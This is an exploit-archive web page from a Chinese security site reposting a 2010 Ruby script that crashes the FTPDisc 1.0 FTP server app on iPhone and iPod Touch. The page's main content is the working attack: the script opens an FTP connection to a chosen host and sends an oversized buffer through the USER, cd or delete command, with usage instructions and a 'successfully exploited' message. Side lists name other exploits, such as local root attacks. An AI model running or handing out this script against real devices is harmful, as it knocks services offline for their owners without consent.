首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS
来源:http://pentbox.net/ 作者:Ortega 发布时间:2010-03-02  

###############
# Title -> iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS
# Model -> Tested on iPod Touch 3G 3.1.3
# Software -> FTPDisc 1.0 and FTPDisc 1.0 Lite http://itunes.apple.com/es/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Attacker -> Tested from GNU/Linux (Sidux), fuzzing with a future PenTBox version :P
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit caused by Buffer Overflow
#
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require "socket"
require "net/ftp"

expl = ARGV[0]
host = ARGV[1]

puts ""
if !expl || !host
 puts "HELP - iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS"
 puts ""
 puts "Exploits: 1 - USER [MALFORMED] 2 - cd [MALF] 3 - delete [MALF]"
 puts ""
 puts "- Usage: ftpdisc3io.rb [numberofexploit] [host]"
 puts "- Example: ftpdisc3io.rb 1 192.168.1.2"
 puts ""
else
 buffer = "A"
 10.times do
  buffer = "#{buffer}#{buffer}" # Here de big buffer to send
 end
 if expl == "1" # EXPLOIT 1
  begin
   socket = TCPSocket.new(host, 21)
   puts "[*] Exploiting ..."
   socket.write("USER #{buffer}\r\n")
   puts "[*] Succesfully exploited! :)"
  rescue
   puts "Connection problem"
  end
 elsif expl == "2" || expl == "3"
  begin
   print "[*] Connecting to FTP ... "
   ftp = Net::FTP.new(host, "anonymous")
   puts "OK"
   puts "[*] Exploiting ..."
   if expl == "2"
    begin
     ftp.chdir(buffer) # EXPLOIT 2
    rescue
    end
   else
    begin
     ftp.delete(buffer) # EXPLOIT 3
    rescue
    end
   end
   puts "[*] Succesfully exploited! :)"
  rescue
   puts "Connection problem"
  end
 else
  puts "Incorrect exploit selection (1, 2, 3)"
 end
end
puts ""


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows XP Home Edition SP3 En
·Tod Miller Sudo 1.6.x before 1
·Todd Miller Sudo local root ex
·Internet Explorer 'winhlp32.ex
·Easy FTP Server version 1.7.0.
·Mozilla Firefox v3.6 and Opera
·Internet Exploiter II version
·ProSSHD v1.2 20090726 Buffer O
·Opera <= 10.50 integer overflo
·MiNBank 1.5.0 Remote Command E
·Joomla Component com_liveticke
·Microsoft OWC Spreadsheet HTML
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved